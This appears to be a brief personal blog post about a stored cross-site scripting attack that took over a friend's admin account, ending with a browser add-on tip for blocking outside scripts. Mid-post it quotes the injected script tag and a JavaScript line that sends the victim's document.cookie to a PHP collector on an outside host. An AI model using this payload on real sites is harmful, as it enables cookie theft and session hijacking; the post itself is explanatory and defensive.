A small hack story

One of my friend came to me and told me he lost his admin user while he was browsing the web site. I was surprised because normally it does not happen. if that site was using asp.net :) its sad but true asp.net does not allow html inclusion in post data. anyway the hacker puts a script code into his name field like this:

src="http://inso.host.sk/sniffer/c.js"></script>

its not a big deal if you look the output of this script you will see this:

a=new/**/Image();a.src='http://inso.host.sk/sniffer/s.php?a='+escape(document.cookie);

at the end it stoles browser's cookie and send it to a php file. while the hacker browsing another url and see which fish got fall for a trick :) anyway today I made a research and found a solution to this situation:

https://addons.mozilla.org/en-US/firefox/addon/722

you should simply disable all js inclusions in the page except the domain. that will make your browser more secure.

Comments

Popular posts from this blog

Postgresql group by day, week and month examples

Next (2007)

Spring-boot vs Quarkus